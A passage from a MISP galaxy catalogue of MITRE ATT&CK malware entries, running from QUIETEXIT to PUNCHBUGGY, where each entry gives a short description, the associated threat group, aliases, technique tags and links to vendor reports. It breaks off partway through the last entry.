[QUIETEXIT](https://attack.mitre.org/software/S1084) is a novel backdoor, based on the open-source Dropbear SSH client-server software, that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2021. [APT29](https://attack.mitre.org/groups/G0016) has deployed [QUIETEXIT](https://attack.mitre.org/software/S1084) on opaque network appliances that typically don’t support antivirus or endpoint detection and response tools within a victim environment.(Citation: Mandiant APT29 Eye Spy Email Nov 22)

The tag is: misp-galaxy:mitre-malware="QUIETEXIT - S1084"

QUIETEXIT - S1084 is also known as:

  • QUIETEXIT

Table 7519. Table References

Links

https://attack.mitre.org/software/S1084

https://www.mandiant.com/resources/blog/unc3524-eye-spy-email

POWRUNER - S0184

[POWRUNER](https://attack.mitre.org/software/S0184) is a PowerShell script that sends and receives commands to and from the C2 server. (Citation: FireEye APT34 Dec 2017)

The tag is: misp-galaxy:mitre-malware="POWRUNER - S0184"

POWRUNER - S0184 is also known as:

  • POWRUNER

POWRUNER - S0184 has relationships with:

  • similar: misp-galaxy:malpedia="POWRUNER" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 7520. Table References

Links

https://attack.mitre.org/software/S0184

https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html

ViceLeaker - S0418

[ViceLeaker](https://attack.mitre.org/software/S0418) is a spyware framework, capable of extensive surveillance and data exfiltration operations, primarily targeting devices belonging to Israeli citizens.(Citation: SecureList - ViceLeaker 2019)(Citation: Bitdefender - Triout 2018)

The tag is: misp-galaxy:mitre-malware="ViceLeaker - S0418"

ViceLeaker - S0418 is also known as:

  • ViceLeaker

  • Triout

Table 7521. Table References

Links

https://attack.mitre.org/software/S0418

https://labs.bitdefender.com/2018/08/triout-spyware-framework-for-android-with-extensive-surveillance-capabilities/

https://securelist.com/fanning-the-flames-viceleaker-operation/90877/

RTM - S0148

[RTM](https://attack.mitre.org/software/S0148) is custom malware written in Delphi. It is used by the group of the same name ([RTM](https://attack.mitre.org/groups/G0048)). Newer versions of the malware have been reported publicly as Redaman.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)

The tag is: misp-galaxy:mitre-malware="RTM - S0148"

RTM - S0148 is also known as:

  • RTM

  • Redaman

RTM - S0148 has relationships with:

  • similar: misp-galaxy:malpedia="RTM" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Install Root Certificate - T1130" with estimative-language:likelihood-probability="almost-certain"

Table 7522. Table References

Links

https://attack.mitre.org/software/S0148

https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/

https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf

SUGARUSH - S1049

[SUGARUSH](https://attack.mitre.org/software/S1049) is a small custom backdoor that can establish a reverse shell over TCP to a hard coded C2 address. [SUGARUSH](https://attack.mitre.org/software/S1049) was first identified during analysis of UNC3890’s [C0010](https://attack.mitre.org/campaigns/C0010) campaign targeting Israeli companies, which began in late 2020.(Citation: Mandiant UNC3890 Aug 2022)

The tag is: misp-galaxy:mitre-malware="SUGARUSH - S1049"

SUGARUSH - S1049 is also known as:

  • SUGARUSH

Table 7523. Table References

Links

https://attack.mitre.org/software/S1049

https://www.mandiant.com/resources/blog/suspected-iranian-actor-targeting-israeli-shipping

SimBad - S0419

[SimBad](https://attack.mitre.org/software/S0419) was a strain of adware on the Google Play Store, distributed through the RXDroider Software Development Kit. The name "SimBad" was derived from the fact that most of the infected applications were simulator games. The adware was controlled using an instance of the open source framework Parse Server.(Citation: CheckPoint SimBad 2019)

The tag is: misp-galaxy:mitre-malware="SimBad - S0419"

SimBad - S0419 is also known as:

  • SimBad

Table 7524. Table References

Links

https://attack.mitre.org/software/S0419

https://research.checkpoint.com/simbad-a-rogue-adware-campaign-on-google-play/

MoonWind - S0149

[MoonWind](https://attack.mitre.org/software/S0149) is a remote access tool (RAT) that was used in 2016 to target organizations in Thailand. (Citation: Palo Alto MoonWind March 2017)

The tag is: misp-galaxy:mitre-malware="MoonWind - S0149"

MoonWind - S0149 is also known as:

  • MoonWind

MoonWind - S0149 has relationships with:

  • similar: misp-galaxy:tool="MoonWind" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="MoonWind" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:rat="MoonWind" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

Table 7525. Table References

Links

http://researchcenter.paloaltonetworks.com/2017/03/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/

https://attack.mitre.org/software/S0149

StrongPity - S0491

[StrongPity](https://attack.mitre.org/software/S0491) is an information stealing malware used by [PROMETHIUM](https://attack.mitre.org/groups/G0056).(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)

The tag is: misp-galaxy:mitre-malware="StrongPity - S0491"

StrongPity - S0491 is also known as:

  • StrongPity

Table 7526. Table References

Links

https://attack.mitre.org/software/S0491

https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html

https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf

SharkBot - S1055

[SharkBot](https://attack.mitre.org/software/S1055) is a banking malware, first discovered in October 2021, that tries to initiate money transfers directly from compromised devices by abusing Accessibility Services.(Citation: nccgroup_sharkbot_0322)

The tag is: misp-galaxy:mitre-malware="SharkBot - S1055"

SharkBot - S1055 is also known as:

  • SharkBot

Table 7527. Table References

Links

https://attack.mitre.org/software/S1055

https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/

WINDSHIELD - S0155

[WINDSHIELD](https://attack.mitre.org/software/S0155) is a signature backdoor used by [APT32](https://attack.mitre.org/groups/G0050). (Citation: FireEye APT32 May 2017)

The tag is: misp-galaxy:mitre-malware="WINDSHIELD - S0155"

WINDSHIELD - S0155 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 7528. Table References

Links

https://attack.mitre.org/software/S0155

https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html

GoldenEagle - S0551

[GoldenEagle](https://attack.mitre.org/software/S0551) is a piece of Android malware that has been used in targeting of Uyghurs, Muslims, Tibetans, individuals in Turkey, and individuals in China. Samples have been found as early as 2012.(Citation: Lookout Uyghur Campaign)

The tag is: misp-galaxy:mitre-malware="GoldenEagle - S0551"

GoldenEagle - S0551 is also known as:

  • GoldenEagle

Table 7529. Table References

Links

https://attack.mitre.org/software/S0551

https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf

WellMail - S0515

[WellMail](https://attack.mitre.org/software/S0515) is a lightweight malware written in Golang used by [APT29](https://attack.mitre.org/groups/G0016), similar in design and structure to [WellMess](https://attack.mitre.org/software/S0514).(Citation: CISA WellMail July 2020)(Citation: NCSC APT29 July 2020)

The tag is: misp-galaxy:mitre-malware="WellMail - S0515"

WellMail - S0515 is also known as:

  • WellMail

Table 7530. Table References

Links

https://attack.mitre.org/software/S0515

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198c

https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf

SombRAT - S0615

[SombRAT](https://attack.mitre.org/software/S0615) is a modular backdoor written in C++ that has been used since at least 2019 to download and execute malicious payloads, including [FIVEHANDS](https://attack.mitre.org/software/S0618) ransomware.(Citation: BlackBerry CostaRicto November 2020)(Citation: FireEye FiveHands April 2021)(Citation: CISA AR21-126A FIVEHANDS May 2021)

The tag is: misp-galaxy:mitre-malware="SombRAT - S0615"

SombRAT - S0615 is also known as:

  • SombRAT

Table 7531. Table References

Links

https://attack.mitre.org/software/S0615

https://blogs.blackberry.com/en/2020/11/the-costaricto-campaign-cyber-espionage-outsourced

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a

https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html

BoxCaon - S0651

[BoxCaon](https://attack.mitre.org/software/S0651) is a Windows backdoor that was used by [IndigoZebra](https://attack.mitre.org/groups/G0136) in a 2021 spearphishing campaign against Afghan government officials. [BoxCaon](https://attack.mitre.org/software/S0651)'s name stems from similarities shared with the malware family [xCaon](https://attack.mitre.org/software/S0653).(Citation: Checkpoint IndigoZebra July 2021)

The tag is: misp-galaxy:mitre-malware="BoxCaon - S0651"

BoxCaon - S0651 is also known as:

  • BoxCaon

Table 7532. Table References

Links

https://attack.mitre.org/software/S0651

https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/

https://thehackernews.com/2021/07/indigozebra-apt-hacking-campaign.html

SoreFang - S0516

[SoreFang](https://attack.mitre.org/software/S0516) is first stage downloader used by [APT29](https://attack.mitre.org/groups/G0016) for exfiltration and to load other malware.(Citation: NCSC APT29 July 2020)(Citation: CISA SoreFang July 2016)

The tag is: misp-galaxy:mitre-malware="SoreFang - S0516"

SoreFang - S0516 is also known as:

  • SoreFang

Table 7533. Table References

Links

https://attack.mitre.org/software/S0516

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a

https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf

KOMPROGO - S0156

[KOMPROGO](https://attack.mitre.org/software/S0156) is a signature backdoor used by [APT32](https://attack.mitre.org/groups/G0050) that is capable of process, file, and registry management. (Citation: FireEye APT32 May 2017)

The tag is: misp-galaxy:mitre-malware="KOMPROGO - S0156"

KOMPROGO - S0156 is also known as:

  • KOMPROGO

KOMPROGO - S0156 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 7534. Table References

Links

https://attack.mitre.org/software/S0156

https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html

GuLoader - S0561

[GuLoader](https://attack.mitre.org/software/S0561) is a file downloader that has been used since at least December 2019 to distribute a variety of remote administration tool (RAT) malware, including [NETWIRE](https://attack.mitre.org/software/S0198), [Agent Tesla](https://attack.mitre.org/software/S0331), [NanoCore](https://attack.mitre.org/software/S0336), FormBook, and Parallax RAT.(Citation: Unit 42 NETWIRE April 2020)(Citation: Medium Eli Salem GuLoader April 2021)

The tag is: misp-galaxy:mitre-malware="GuLoader - S0561"

GuLoader - S0561 is also known as:

  • GuLoader

Table 7535. Table References

Links

https://attack.mitre.org/software/S0561

https://elis531989.medium.com/dancing-with-shellcodes-cracking-the-latest-version-of-guloader-75083fb15cb4

https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/

OSInfo - S0165

[OSInfo](https://attack.mitre.org/software/S0165) is a custom tool used by [APT3](https://attack.mitre.org/groups/G0022) to do internal discovery on a victim’s computer and network. (Citation: Symantec Buckeye)

The tag is: misp-galaxy:mitre-malware="OSInfo - S0165"

OSInfo - S0165 is also known as:

  • OSInfo

OSInfo - S0165 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

Table 7536. Table References

Links

http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong

https://attack.mitre.org/software/S0165

TianySpy - S1056

[TianySpy](https://attack.mitre.org/software/S1056) is a mobile malware primarily spread by SMS phishing between September 30 and October 12, 2021. [TianySpy](https://attack.mitre.org/software/S1056) is believed to have targeted credentials associated with membership websites of major Japanese telecommunication services.(Citation: trendmicro_tianyspy_0122)

The tag is: misp-galaxy:mitre-malware="TianySpy - S1056"

TianySpy - S1056 is also known as:

  • TianySpy

Table 7537. Table References

Links

https://attack.mitre.org/software/S1056

https://www.trendmicro.com/en_us/research/22/a/tianyspy-malware-uses-smishing-disguised-as-message-from-telco.html

KOPILUWAK - S1075

[KOPILUWAK](https://attack.mitre.org/software/S1075) is a JavaScript-based reconnaissance tool that has been used for victim profiling and C2 since at least 2017.(Citation: Mandiant Suspected Turla Campaign February 2023)

The tag is: misp-galaxy:mitre-malware="KOPILUWAK - S1075"

KOPILUWAK - S1075 is also known as:

  • KOPILUWAK

Table 7538. Table References

Links

https://attack.mitre.org/software/S1075

https://www.mandiant.com/resources/blog/turla-galaxy-opportunity

SOUNDBITE - S0157

[SOUNDBITE](https://attack.mitre.org/software/S0157) is a signature backdoor used by [APT32](https://attack.mitre.org/groups/G0050). (Citation: FireEye APT32 May 2017)

The tag is: misp-galaxy:mitre-malware="SOUNDBITE - S0157"

SOUNDBITE - S0157 is also known as:

  • SOUNDBITE

SOUNDBITE - S0157 has relationships with:

  • similar: misp-galaxy:malpedia="SOUNDBITE" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 7539. Table References

Links

https://attack.mitre.org/software/S0157

https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html

Pillowmint - S0517

[Pillowmint](https://attack.mitre.org/software/S0517) is a point-of-sale malware used by [FIN7](https://attack.mitre.org/groups/G0046) designed to capture credit card information.(Citation: Trustwave Pillowmint June 2020)

The tag is: misp-galaxy:mitre-malware="Pillowmint - S0517"

Pillowmint - S0517 is also known as:

  • Pillowmint

Table 7540. Table References

Links

https://attack.mitre.org/software/S0517

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/

SEASHARPEE - S0185

[SEASHARPEE](https://attack.mitre.org/software/S0185) is a Web shell that has been used by [OilRig](https://attack.mitre.org/groups/G0049). (Citation: FireEye APT34 Webinar Dec 2017)

The tag is: misp-galaxy:mitre-malware="SEASHARPEE - S0185"

SEASHARPEE - S0185 is also known as:

  • SEASHARPEE

SEASHARPEE - S0185 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 7541. Table References

Links

https://attack.mitre.org/software/S0185

https://www.brighttalk.com/webcast/10703/296317/apt34-new-targeted-attack-in-the-middle-east

PHOREAL - S0158

[PHOREAL](https://attack.mitre.org/software/S0158) is a signature backdoor used by [APT32](https://attack.mitre.org/groups/G0050). (Citation: FireEye APT32 May 2017)

The tag is: misp-galaxy:mitre-malware="PHOREAL - S0158"

PHOREAL - S0158 is also known as:

  • PHOREAL

PHOREAL - S0158 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 7542. Table References

Links

https://attack.mitre.org/software/S0158

https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html

PolyglotDuke - S0518

[PolyglotDuke](https://attack.mitre.org/software/S0518) is a downloader that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2013. [PolyglotDuke](https://attack.mitre.org/software/S0518) has been used to drop [MiniDuke](https://attack.mitre.org/software/S0051).(Citation: ESET Dukes October 2019)

The tag is: misp-galaxy:mitre-malware="PolyglotDuke - S0518"

PolyglotDuke - S0518 is also known as:

  • PolyglotDuke

Table 7543. Table References

Links

https://attack.mitre.org/software/S0518

https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf

Prestige - S1058

[Prestige](https://attack.mitre.org/software/S1058) ransomware has been used by [Sandworm Team](https://attack.mitre.org/groups/G0034) since at least March 2022, including against transportation and related logistics industries in Ukraine and Poland in October 2022.(Citation: Microsoft Prestige ransomware October 2022)

The tag is: misp-galaxy:mitre-malware="Prestige - S1058"

Prestige - S1058 is also known as:

  • Prestige

Table 7544. Table References

Links

https://attack.mitre.org/software/S1058

https://www.microsoft.com/en-us/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/

Sardonic - S1085

[Sardonic](https://attack.mitre.org/software/S1085) is a backdoor written in C and C++ that is known to be used by [FIN8](https://attack.mitre.org/groups/G0061), as early as August 2021 to target a financial institution in the United States. [Sardonic](https://attack.mitre.org/software/S1085) has a plugin system that can load specially made DLLs and execute their functions.(Citation: Bitdefender Sardonic Aug 2021)(Citation: Symantec FIN8 Jul 2023)

The tag is: misp-galaxy:mitre-malware="Sardonic - S1085"

Sardonic - S1085 is also known as:

  • Sardonic

Table 7545. Table References

Links

https://attack.mitre.org/software/S1085

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/syssphinx-fin8-backdoor

https://www.bitdefender.com/files/News/CaseStudies/study/401/Bitdefender-PR-Whitepaper-FIN8-creat5619-en-EN.pdf

SNUGRIDE - S0159

[SNUGRIDE](https://attack.mitre.org/software/S0159) is a backdoor that has been used by [menuPass](https://attack.mitre.org/groups/G0045) as first stage malware. (Citation: FireEye APT10 April 2017)

The tag is: misp-galaxy:mitre-malware="SNUGRIDE - S0159"

SNUGRIDE - S0159 is also known as:

  • SNUGRIDE

SNUGRIDE - S0159 has relationships with:

  • similar: misp-galaxy:tool="SNUGRIDE" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"

Table 7546. Table References

Links

https://attack.mitre.org/software/S0159

https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html

metaMain - S1059

[metaMain](https://attack.mitre.org/software/S1059) is a backdoor used by [Metador](https://attack.mitre.org/groups/G1013) to maintain long-term access to compromised machines; it has also been used to decrypt [Mafalda](https://attack.mitre.org/software/S1060) into memory.(Citation: SentinelLabs Metador Sept 2022)(Citation: SentinelLabs Metador Technical Appendix Sept 2022)

The tag is: misp-galaxy:mitre-malware="metaMain - S1059"

metaMain - S1059 is also known as:

  • metaMain

Table 7547. Table References

Links

https://assets.sentinelone.com/sentinellabs22/metador#page=1

https://attack.mitre.org/software/S1059

https://docs.google.com/document/d/1e9ZTW9b71YwFWS_18ZwDAxa-cYbV8q1wUefmKZLYVsA/edit#heading=h.lmnbtht1ikzm

DEATHRANSOM - S0616

[DEATHRANSOM](https://attack.mitre.org/software/S0616) is ransomware written in C that has been used since at least 2020, and has potential overlap with [FIVEHANDS](https://attack.mitre.org/software/S0618) and [HELLOKITTY](https://attack.mitre.org/software/S0617).(Citation: FireEye FiveHands April 2021)

The tag is: misp-galaxy:mitre-malware="DEATHRANSOM - S0616"

DEATHRANSOM - S0616 is also known as:

  • DEATHRANSOM

Table 7548. Table References

Links

https://attack.mitre.org/software/S0616

https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html

RemoteCMD - S0166

[RemoteCMD](https://attack.mitre.org/software/S0166) is a custom tool used by [APT3](https://attack.mitre.org/groups/G0022) to execute commands on a remote system similar to SysInternal’s PSEXEC functionality. (Citation: Symantec Buckeye)

The tag is: misp-galaxy:mitre-malware="RemoteCMD - S0166"

RemoteCMD - S0166 is also known as:

  • RemoteCMD

RemoteCMD - S0166 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Remote Services - T1021" with estimative-language:likelihood-probability="almost-certain"

Table 7549. Table References

Links

http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong

https://attack.mitre.org/software/S0166

DarkTortilla - S1066

[DarkTortilla](https://attack.mitre.org/software/S1066) is a highly configurable .NET-based crypter that has been possibly active since at least August 2015. [DarkTortilla](https://attack.mitre.org/software/S1066) has been used to deliver popular information stealers, RATs, and payloads such as [Agent Tesla](https://attack.mitre.org/software/S0331), AsyncRat, [NanoCore](https://attack.mitre.org/software/S0336), RedLine, [Cobalt Strike](https://attack.mitre.org/software/S0154), and Metasploit.(Citation: Secureworks DarkTortilla Aug 2022)

The tag is: misp-galaxy:mitre-malware="DarkTortilla - S1066"

DarkTortilla - S1066 is also known as:

  • DarkTortilla

Table 7550. Table References

Links

https://attack.mitre.org/software/S1066

https://www.secureworks.com/research/darktortilla-malware-analysis

FoggyWeb - S0661

[FoggyWeb](https://attack.mitre.org/software/S0661) is a passive and highly-targeted backdoor capable of remotely exfiltrating sensitive information from a compromised Active Directory Federated Services (AD FS) server. It has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least early April 2021.(Citation: MSTIC FoggyWeb September 2021)

The tag is: misp-galaxy:mitre-malware="FoggyWeb - S0661"

FoggyWeb - S0661 is also known as:

  • FoggyWeb

Table 7551. Table References

Links

https://attack.mitre.org/software/S0661

https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/

QUIETCANARY - S1076

[QUIETCANARY](https://attack.mitre.org/software/S1076) is a backdoor tool written in .NET that has been used since at least 2022 to gather and exfiltrate data from victim networks.(Citation: Mandiant Suspected Turla Campaign February 2023)

The tag is: misp-galaxy:mitre-malware="QUIETCANARY - S1076"

QUIETCANARY - S1076 is also known as:

  • QUIETCANARY

  • Tunnus

Table 7552. Table References

Links

https://attack.mitre.org/software/S1076

https://www.mandiant.com/resources/blog/turla-galaxy-opportunity

FluBot - S1067

[FluBot](https://attack.mitre.org/software/S1067) is a multi-purpose mobile banking malware that was first observed in Spain in late 2020. It primarily spread through European countries using a variety of SMS phishing messages in multiple languages.(Citation: proofpoint_flubot_0421)(Citation: bitdefender_flubot_0524)

The tag is: misp-galaxy:mitre-malware="FluBot - S1067"

FluBot - S1067 is also known as:

  • FluBot

Table 7553. Table References

Links

https://attack.mitre.org/software/S1067

https://www.bitdefender.com/blog/labs/new-flubot-campaign-sweeps-through-europe-targeting-android-and-ios-users-alike/

https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon

HELLOKITTY - S0617

[HELLOKITTY](https://attack.mitre.org/software/S0617) is a ransomware written in C++ that shares similar code structure and functionality with [DEATHRANSOM](https://attack.mitre.org/software/S0616) and [FIVEHANDS](https://attack.mitre.org/software/S0618). [HELLOKITTY](https://attack.mitre.org/software/S0617) has been used since at least 2020, targets have included a Polish video game developer and a Brazilian electric power company.(Citation: FireEye FiveHands April 2021)

The tag is: misp-galaxy:mitre-malware="HELLOKITTY - S0617"

HELLOKITTY - S0617 is also known as:

  • HELLOKITTY

Table 7554. Table References

Links

https://attack.mitre.org/software/S0617

https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html

Matryoshka - S0167

[Matryoshka](https://attack.mitre.org/software/S0167) is a malware framework used by [CopyKittens](https://attack.mitre.org/groups/G0052) that consists of a dropper, loader, and RAT. It has multiple versions; v1 was seen in the wild from July 2016 until January 2017. v2 has fewer commands and other minor differences. (Citation: ClearSky Wilted Tulip July 2017) (Citation: CopyKittens Nov 2015)

The tag is: misp-galaxy:mitre-malware="Matryoshka - S0167"

Matryoshka - S0167 is also known as:

  • Matryoshka

Matryoshka - S0167 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 7555. Table References

Links

http://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf

https://attack.mitre.org/software/S0167

https://s3-eu-west-1.amazonaws.com/minervaresearchpublic/CopyKittens/CopyKittens.pdf

Tomiris - S0671

[Tomiris](https://attack.mitre.org/software/S0671) is a backdoor written in Go that continuously queries its C2 server for executables to download and execute on a victim system. It was first reported in September 2021 during an investigation of a successful DNS hijacking campaign against a Commonwealth of Independent States (CIS) member. Security researchers assess there are similarities between [Tomiris](https://attack.mitre.org/software/S0671) and [GoldMax](https://attack.mitre.org/software/S0588).(Citation: Kaspersky Tomiris Sep 2021)

The tag is: misp-galaxy:mitre-malware="Tomiris - S0671"

Tomiris - S0671 is also known as:

  • Tomiris

Table 7556. Table References

Links

https://attack.mitre.org/software/S0671

https://securelist.com/darkhalo-after-solarwinds-the-tomiris-connection/104311/

Wingbird - S0176

[Wingbird](https://attack.mitre.org/software/S0176) is a backdoor that appears to be a version of commercial software [FinFisher](https://attack.mitre.org/software/S0182). It is reportedly used to attack individual computers instead of networks. It was used by [NEODYMIUM](https://attack.mitre.org/groups/G0055) in a May 2016 campaign. (Citation: Microsoft SIR Vol 21) (Citation: Microsoft NEODYMIUM Dec 2016)

The tag is: misp-galaxy:mitre-malware="Wingbird - S0176"

Wingbird - S0176 is also known as:

  • Wingbird

Wingbird - S0176 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1073" with estimative-language:likelihood-probability="almost-certain"

Table 7557. Table References

Links

http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf

https://attack.mitre.org/software/S0176

https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Win32/Wingbird.A!dha

FIVEHANDS - S0618

[FIVEHANDS](https://attack.mitre.org/software/S0618) is a customized version of [DEATHRANSOM](https://attack.mitre.org/software/S0616) ransomware written in C++. [FIVEHANDS](https://attack.mitre.org/software/S0618) has been used since at least 2021, including in Ransomware-as-a-Service (RaaS) campaigns, sometimes along with [SombRAT](https://attack.mitre.org/software/S0615).(Citation: FireEye FiveHands April 2021)(Citation: NCC Group Fivehands June 2021)

The tag is: misp-galaxy:mitre-malware="FIVEHANDS - S0618"

FIVEHANDS - S0618 is also known as:

  • FIVEHANDS

Table 7558. Table References

Links

https://attack.mitre.org/software/S0618

https://research.nccgroup.com/2021/06/15/handy-guide-to-a-new-fivehands-ransomware-variant/

https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html

BlackCat - S1068

[BlackCat](https://attack.mitre.org/software/S1068) is ransomware written in Rust that has been offered via the Ransomware-as-a-Service (RaaS) model. First observed November 2021, [BlackCat](https://attack.mitre.org/software/S1068) has been used to target multiple sectors and organizations in various countries and regions in Africa, the Americas, Asia, Australia, and Europe.(Citation: Microsoft BlackCat Jun 2022)(Citation: Sophos BlackCat Jul 2022)(Citation: ACSC BlackCat Apr 2022)

The tag is: misp-galaxy:mitre-malware="BlackCat - S1068"

BlackCat - S1068 is also known as:

  • BlackCat

  • ALPHV

  • Noberus

Table 7559. Table References

Links

https://attack.mitre.org/software/S1068

https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/

https://www.cyber.gov.au/about-us/advisories/2022-004-acsc-ransomware-profile-alphv-aka-blackcat

https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/

DownPaper - S0186

[DownPaper](https://attack.mitre.org/software/S0186) is a backdoor Trojan; its main functionality is to download and run second stage malware. (Citation: ClearSky Charming Kitten Dec 2017)

The tag is: misp-galaxy:mitre-malware="DownPaper - S0186"

DownPaper - S0186 is also known as:

  • DownPaper

DownPaper - S0186 has relationships with:

  • similar: misp-galaxy:malpedia="DownPaper" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"

Table 7560. Table References

Links

http://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf

https://attack.mitre.org/software/S0186

Gazer - S0168

[Gazer](https://attack.mitre.org/software/S0168) is a backdoor used by [Turla](https://attack.mitre.org/groups/G0010) since at least 2016. (Citation: ESET Gazer Aug 2017)

The tag is: misp-galaxy:mitre-malware="Gazer - S0168"

Gazer - S0168 is also known as:

  • Gazer

  • WhiteBear

Gazer - S0168 has relationships with:

  • similar: misp-galaxy:malpedia="Gazer" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 7561. Table References

Links

https://attack.mitre.org/software/S0168

https://securelist.com/introducing-whitebear/81638/

https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/

https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf

Lizar - S0681

[Lizar](https://attack.mitre.org/software/S0681) is a modular remote access tool written using the .NET Framework that shares structural similarities to [Carbanak](https://attack.mitre.org/software/S0030). It has likely been used by [FIN7](https://attack.mitre.org/groups/G0046) since at least February 2021.(Citation: BiZone Lizar May 2021)(Citation: Threatpost Lizar May 2021)(Citation: Gemini FIN7 Oct 2021)

The tag is: misp-galaxy:mitre-malware="Lizar - S0681"

Lizar - S0681 is also known as:

  • Lizar

  • Tirion

Table 7562. Table References

Links

https://attack.mitre.org/software/S0681

https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319

https://geminiadvisory.io/fin7-ransomware-bastion-secure/

https://threatpost.com/fin7-backdoor-ethical-hacking-tool/166194/

PUNCHBUGGY - S0196

[PUNCHBUGGY](https://attack.mitre.org/software/S0196) is a backdoor malware used by [FIN8](https://attack.mitre.org/groups/G0061) that has been observed targeting POS networks in the hospitality industry. (Citation: Morphisec ShellTea June 2019)(Citation: FireEye Fin8 May 2016) (Citation: FireEye Know Your Enemy FIN8 Aug 2016)

The tag is: misp-galaxy:mitre-malware="PUNCHBUGGY - S0196"

PUNCHBUGGY - S0196 is also known as:

  • PUNCHBUGGY

  • ShellTea

PUNCHBUGGY - S0196 has relationships with:

